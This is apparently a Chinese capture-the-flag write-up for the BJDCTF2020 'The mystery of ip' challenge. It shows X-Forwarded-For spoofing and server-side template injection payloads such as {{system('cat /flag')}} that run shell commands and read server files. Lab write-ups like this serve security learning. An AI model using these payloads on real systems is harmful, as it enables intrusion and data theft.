[BJDCTF2020]The mystery of ip

点击flag

[BJDCTF2020]The mystery of ip_第1张图片

发现

[BJDCTF2020]The mystery of ip_第2张图片

经过一番查找,发现这是个内网地址,而且不是访问者的ip

使用X-Forwarded-For进行伪造地址:
[BJDCTF2020]The mystery of ip_第3张图片

测试{{2*2}}

[BJDCTF2020]The mystery of ip_第4张图片

直接查看当前目录下的内容:

{{system('ls')}}

[BJDCTF2020]The mystery of ip_第5张图片

查看flag.php

{{system('cat flag.php')}}

 [BJDCTF2020]The mystery of ip_第6张图片

是假的,被骗了

再查看根目录

{{system('ls /')}}

[BJDCTF2020]The mystery of ip_第7张图片

然后查看flag

{{system('cat /flag')}}

[BJDCTF2020]The mystery of ip_第8张图片 

得到flag

你可能感兴趣的:(BUUCTF,web安全)